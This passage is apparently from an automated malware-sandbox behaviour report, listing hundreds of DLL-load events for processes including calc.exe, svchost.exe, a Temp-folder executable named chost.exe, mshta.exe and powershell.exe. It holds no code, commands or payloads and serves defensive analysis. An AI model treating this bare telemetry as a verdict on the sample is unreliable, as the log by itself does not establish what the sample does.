                    Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vccorlib140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: concrt140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.datatransfer.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rometadata.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windowmanagementapi.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uiamanager.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.immersive.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: fontgroupsoverride.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.energy.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.graphics.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: winrttracing.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: directmanipulation.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profext.dllJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.web.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: photometadatahandler.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: python3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: libffi-8.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: libcrypto-3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: libssl-3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
